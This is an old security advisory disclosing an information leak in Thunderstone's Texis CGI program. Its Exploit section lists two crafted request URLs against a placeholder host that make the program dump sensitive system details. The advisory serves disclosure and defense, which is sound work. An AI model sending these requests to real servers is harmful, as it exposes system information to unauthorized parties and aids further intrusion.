-----BEGIN PGP SIGNED MESSAGE----- //@(#) Mordred Security Labs advisory Release date: March 15, 2003 Name: Texis sensitive information leak Versions affected: all versions Risk: average Author: Sir Mordred (mordred@s-mail.com, http://mslabs.iwebland.com) I. Description: Thunderstone is an independent R&D company that has been providing high-performance state-of-the-art solutions to intelligent information retrieval and management problems for over 21 years. Their product, Texis, provides every full-text, SQL, multimedia management, and dynamic publishing operation needed for an enterprise search application. For more info please visit http://www.thunderstone.com/texis/site/pages II. Details: The texis program executes files written in Texis Web Script (aka Vortex), a powerful web-server-side HTML programming language. It can be invoked from the command line, or as a CGI program from the web server to run scripts. By requesting a specially crafted urls, a very sensitive information about the system will be displayed. III. Exploit: http://victim.com/texis.exe/?-version http://victim.com/texis.exe/?-dump IV. Vendor Vendor contacted, no reply since. -----BEGIN PGP SIGNATURE----- Version: Hush 2.2 (Java) Note: This signature can be verified at https://www.hushtools.com/verify wmAEARECACAFAj5yWYgZHHNpci5tb3JkcmVkQGh1c2htYWlsLmNvbQAKCRAOkXvN4BZr fD4UAKCVeAeOZhA1eVLg2xvas9R9rih8GQCgm0VbeqP8gCHKLVna1oTb0YFXKok= =9+oU -----END PGP SIGNATURE----- Concerned about your privacy? Follow this link to get FREE encrypted email: https://www.hushmail.com/?l=2 Big $$$ to be made with the HushMail Affiliate Program: https://www.hushmail.com/about.php?subloc=affiliate&l=427
